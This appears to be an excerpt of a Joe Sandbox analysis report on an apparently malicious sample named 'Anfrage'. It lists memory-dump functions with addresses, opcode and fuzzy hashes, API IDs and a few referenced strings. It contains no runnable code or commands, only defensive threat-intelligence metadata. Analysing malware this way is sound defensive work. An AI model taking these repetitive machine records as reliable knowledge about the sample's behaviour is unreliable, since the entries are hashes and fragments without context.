                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID:
                                                                          • API String ID: 4062629308-0
                                                                          • Opcode ID: d6d925caf8c50df51fa48e09bf07deeb06bfdbe634db4cebcc9f5908cafd0034
                                                                          • Instruction ID: 415d42360f530f56b29c4f44eba481a9ec7fd1b0eeb5fb1c84c39b82f8d83ace
                                                                          • Opcode Fuzzy Hash: d6d925caf8c50df51fa48e09bf07deeb06bfdbe634db4cebcc9f5908cafd0034
                                                                          • Instruction Fuzzy Hash: 11C124B5D417298FDB26CF1AC8846D9BBF1FB89314F5081AEE549A7350E734AA81CF40
                                                                          Function 363C1131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 9588a98c1a4f3f0bc73fdb97f23ab06753ff6c7ef4e2ff7eb7e944493d588cb5
                                                                          • Instruction ID: 62192dc0b7f60c1145e981a6c007f5f3186235192b405cc438177ca6de7d940b
                                                                          • Opcode Fuzzy Hash: 9588a98c1a4f3f0bc73fdb97f23ab06753ff6c7ef4e2ff7eb7e944493d588cb5
                                                                          • Instruction Fuzzy Hash: 56B102B5A083408FD355CF29C980A5AFBF1BB89304F54496EF899D7352D731E946CB82
                                                                          Function 363C7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ad80ef638dbb0e1db942fca1669a46c3411efc3dadd9c794a56bf99c455f05d
                                                                          • Instruction ID: 5d119e317fce5a483a76983432d73ec90eabf2784eeb6c6df38bbeea27451ac3
                                                                          • Opcode Fuzzy Hash: 3ad80ef638dbb0e1db942fca1669a46c3411efc3dadd9c794a56bf99c455f05d
                                                                          • Instruction Fuzzy Hash: 02A116B5A08741CFE315CF28C484A1ABBF6BF88754F24496EF98597350EB30E945CB92
                                                                          Function 363C7703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 852e4dd00861aac240e21643567632a4b264e20a34ddb7d2821b6469f27a81ac
                                                                          • Instruction ID: 300378ce74cc7c42269db9da50d77dc06055beaec2de7d71df44b4ded83fa93c
                                                                          • Opcode Fuzzy Hash: 852e4dd00861aac240e21643567632a4b264e20a34ddb7d2821b6469f27a81ac
                                                                          • Instruction Fuzzy Hash: 3E612FB5E04606EFEB09CF78C884A9DFBB5BF45244F24816AE919A7300DB30AD55CBD1
                                                                          Function 363FF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d65fcca55ae00e1a86cfc37d5b87bdc94516c0f29bdad1c6a064155a2c6cf943
                                                                          • Instruction ID: 1160c6e7c29dfa5ffb3209ce9f9ae413e697790bb0090a35aeddb51a0ed00393
                                                                          • Opcode Fuzzy Hash: d65fcca55ae00e1a86cfc37d5b87bdc94516c0f29bdad1c6a064155a2c6cf943
                                                                          • Instruction Fuzzy Hash: 86415BB5D11288DFDB11CFAAC880AAEFBF4FB49340F50416EE999A7211DB319905CF60
                                                                          Function 363BB480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 8b456ffcb671d77c54d852a3956d6d35291eb3c892f70d9c3cbdf8a6851bc59d
                                                                          • Instruction ID: 7efb324c71a767f248414f74b9f7e9ee06e03eafeaf898826cb75d8944cf4261
                                                                          • Opcode Fuzzy Hash: 8b456ffcb671d77c54d852a3956d6d35291eb3c892f70d9c3cbdf8a6851bc59d
                                                                          • Instruction Fuzzy Hash: 7A315372A40304AFDB11CF14C880A5677B9FF85364F10426AED468B291CF31ED06CBE6
                                                                          Function 363C57C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 8fd8a92521ca8b085bc358c846f89879d150c32911073da8ac3f47faf9aee0a1
                                                                          • Instruction ID: aa54524a328427c6c018a7957916b4d87da0eb438ca19b5ef030cbb7f5f2f4cd
                                                                          • Opcode Fuzzy Hash: 8fd8a92521ca8b085bc358c846f89879d150c32911073da8ac3f47faf9aee0a1
                                                                          • Instruction Fuzzy Hash: 1D317E35B25A05BFE7469F24CE80A8ABBA6FF45654F645029E90087B50DB31EC31CBC1
                                                                          Function 363C3616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 484584f9993634c9fbc9c2fbab0871f34d28b71b70ad4630716f757d4efdec25
                                                                          • Instruction ID: ced05506943045babf2d8bfc85e75134707f580fb25d1d358646423cecc08e04
                                                                          • Opcode Fuzzy Hash: 484584f9993634c9fbc9c2fbab0871f34d28b71b70ad4630716f757d4efdec25
                                                                          • Instruction Fuzzy Hash: 77212376A45B509FFB229F05C9C4B5ABBA5FF81B20F610569F9800B750CA74EC18CB93
                                                                          Function 363B92FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 7337696047c855d29156ea5b9a831d5e4ee2f378bb573415c2ba6f063687537c
                                                                          • Instruction ID: 1faae1760f7123fe7ddf480e21b461d0c74e8abfcc214cefbe2a904cdd11e08e
                                                                          • Opcode Fuzzy Hash: 7337696047c855d29156ea5b9a831d5e4ee2f378bb573415c2ba6f063687537c
                                                                          • Instruction Fuzzy Hash: 40F0FA32600640ABEB31DF09CC04F8ABBEDEF86B00F180518A54A935D0CAA1E909C660
                                                                          Function 364916A6 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: W
                                                                          • API String ID: 0-655174618
                                                                          • Opcode ID: 03bc1be759c902a14ed92fa26cf6a6216c670c66a814c57e4e74282b124e2785
                                                                          • Instruction ID: 33d52daeddd2b4d166c4eb621862a0ed9345093a841a4d05e8f11ba0948f14cb
                                                                          • Opcode Fuzzy Hash: 03bc1be759c902a14ed92fa26cf6a6216c670c66a814c57e4e74282b124e2785
                                                                          • Instruction Fuzzy Hash: 88A132B5E40629CFEB25CF25CD80BD9BBF1AB49305F1041EAD849A7351DB349A85CF90
                                                                          Function 3646DEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • System Volume Information, xrefs: 3646DEBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: System Volume Information
                                                                          • API String ID: 0-764423717
                                                                          • Opcode ID: 858200bb3c8130dcc664ca1be04879ac7833e2de9c1a10e8729e2ebc37bdf946
                                                                          • Instruction ID: c12343361123856ce4c6fb3d70637dfd8613e091e8e827ed8814b9c987407e2b
                                                                          • Opcode Fuzzy Hash: 858200bb3c8130dcc664ca1be04879ac7833e2de9c1a10e8729e2ebc37bdf946
                                                                          • Instruction Fuzzy Hash: A7617A71908325AFD711DF55CC80EABB7E9EF98B94F00092DF981972A0EA74DD44CB92
                                                                          Function 363C973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                          • Instruction ID: 04d2ef55fac78dbdd3c5318c74555b421fe23e11deefaefed3daa282cb57b2f6
                                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                          • Instruction Fuzzy Hash: 4C615C75D00329AFEB11CFA6C840F9EBBB8FF84754F614169E810A7290DB749E04CBA5
                                                                          Function 3644F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                          • Instruction ID: b304f48386f4e490639a10e9cba5caaa9df9de2fe737feaa26897a63fb050d69
                                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                          • Instruction Fuzzy Hash: 6251B8B2914701AFE712AF55CC81F6BB7E8FF84754F400929B9809B290DBB5ED04CB92
                                                                          Function 363F3EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                          • Instruction ID: 69c7ec09f3731a8ec58ece10b19f6ab7af8458502f8f82b95c5b353f4e567a38
                                                                          • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                          • Instruction Fuzzy Hash: 13518D716057119FD321CF25C840A6BBBF9FF88750F00892EF99587690E7B4D914CBA6
                                                                          Function 3647B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PreferredUILanguages
                                                                          • API String ID: 0-1884656846
                                                                          • Opcode ID: 32a640bcfdec7bd3589806cc0d0d67e3502cadf46e55e866b52d10037c60a435
                                                                          • Instruction ID: 8747f2d5eae58c400a136adf5cbfaa9333fe540a078167727be40ffd74dbc10d
                                                                          • Opcode Fuzzy Hash: 32a640bcfdec7bd3589806cc0d0d67e3502cadf46e55e866b52d10037c60a435
                                                                          • Instruction Fuzzy Hash: DF41C676D00229ABDF12DE95CC80BEEB7B9EF44754F410166E821EBB50D634DE80C7A1
                                                                          Function 364497A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: verifier.dll
                                                                          • API String ID: 0-3265496382
                                                                          • Opcode ID: 020b34ed99a94b1ffd94709f2f1dfa31a47df4f53f8773b9969ad56dee2f3e00
                                                                          • Instruction ID: 68f4f310154eb1d5af64b9f3f58c659bdfe64461adc4be3c759f47f06389c6b7
                                                                          • Opcode Fuzzy Hash: 020b34ed99a94b1ffd94709f2f1dfa31a47df4f53f8773b9969ad56dee2f3e00
                                                                          • Instruction Fuzzy Hash: 843193B5E243019FEB1AAE2DD861B66B7E5EB49350F94403AE644DF380E631CC81DB90
                                                                          Function 363F7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                          • Instruction ID: 80a5e6febd5823f17c6f48bcae7cb71944aec2c922612f90fe7f4fab06b3a6dc
                                                                          • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                          • Instruction Fuzzy Hash: 4F41DE79E10226ABEB11CF48D894BBEB3B4EF44745F10406AE849AB300DB35D951CBE1
                                                                          Function 363BFF90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 363C0058
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                          • API String ID: 0-996340685
                                                                          • Opcode ID: dfdc04a58d093c43f3c726bb4d0f1fbde4d12035087400e2a6bf033aa8681c10
                                                                          • Instruction ID: 45e645cc69287f0dccea209e3727d392a0f4a0625740c8fae04df2a598ec6665
                                                                          • Opcode Fuzzy Hash: dfdc04a58d093c43f3c726bb4d0f1fbde4d12035087400e2a6bf033aa8681c10
                                                                          • Instruction Fuzzy Hash: C8418379E107969AD724DFB4C4406D7B7F8BF45300F10482EE6AAD3240E735A948CBA2
                                                                          Function 363F36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Flst
                                                                          • API String ID: 0-2374792617
                                                                          • Opcode ID: 9a06515bfd1ca490bb38c52947be2249bdf23f5b2d8607700e6a809b6ac76574
                                                                          • Instruction ID: 74129f9803a9d2897008e6734f297305add0a8cf757bffb5e095b60f87afd57a
                                                                          • Opcode Fuzzy Hash: 9a06515bfd1ca490bb38c52947be2249bdf23f5b2d8607700e6a809b6ac76574
                                                                          • Instruction Fuzzy Hash: B541ABB5A16301DFE305CF19C480A16FBE4EB49754F60816EE4588F241DB32D94ACBE2
                                                                          Function 363B9730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: L4QwL4Qw
                                                                          • API String ID: 3446177414-1417497668
                                                                          • Opcode ID: 59b55641c5f827dbc081ffad05577f65f3c6bff952e78e84d09073adeb7024e0
                                                                          • Instruction ID: 9922e7af32030227dae65313482086348dfea2f65e6588804ff1881d9f45eaa7
                                                                          • Opcode Fuzzy Hash: 59b55641c5f827dbc081ffad05577f65f3c6bff952e78e84d09073adeb7024e0
                                                                          • Instruction Fuzzy Hash: 1821A476D00714AFDB228F59C840B0A7BF9FF86754F120429EA559BB80EB70DC05CB91
                                                                          Function 363FD530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: gK6
                                                                          • API String ID: 0-3136348036
                                                                          • Opcode ID: 2cd0ca30d3577068b7db94b25a99a4bf165dd1a1270cc9a353c8d255f062e87c
                                                                          • Instruction ID: db15913f5ecc03c163b09b75605ac878bcccb87da31c3692a0916d03fc13ab94
                                                                          • Opcode Fuzzy Hash: 2cd0ca30d3577068b7db94b25a99a4bf165dd1a1270cc9a353c8d255f062e87c
                                                                          • Instruction Fuzzy Hash: 4A2135B2D143109BEB01DF64CD84F16B7E9AB49658F50082AFA849B250EB30D814CBE7
                                                                          Function 363C5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Actx
                                                                          • API String ID: 0-89312691
                                                                          • Opcode ID: 56431653141e14b7aca81301f60c55738d2e029232d1074922bf89192beccfc2
                                                                          • Instruction ID: 7174be6ce9dc7176a6328d675efcf3a9bb42ccdd273b169bbc84f9cbb5b83a1d
                                                                          • Opcode Fuzzy Hash: 56431653141e14b7aca81301f60c55738d2e029232d1074922bf89192beccfc2
                                                                          • Instruction Fuzzy Hash: D6117C75B887228BFB144D1E8850616B3D9EF9137CF30852AF490CB391DAB1DC61C780
                                                                          Function 3644106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
